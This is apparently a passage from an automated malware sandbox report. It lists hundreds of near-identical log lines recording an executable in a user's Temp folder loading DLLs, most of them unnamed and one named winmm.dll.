                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
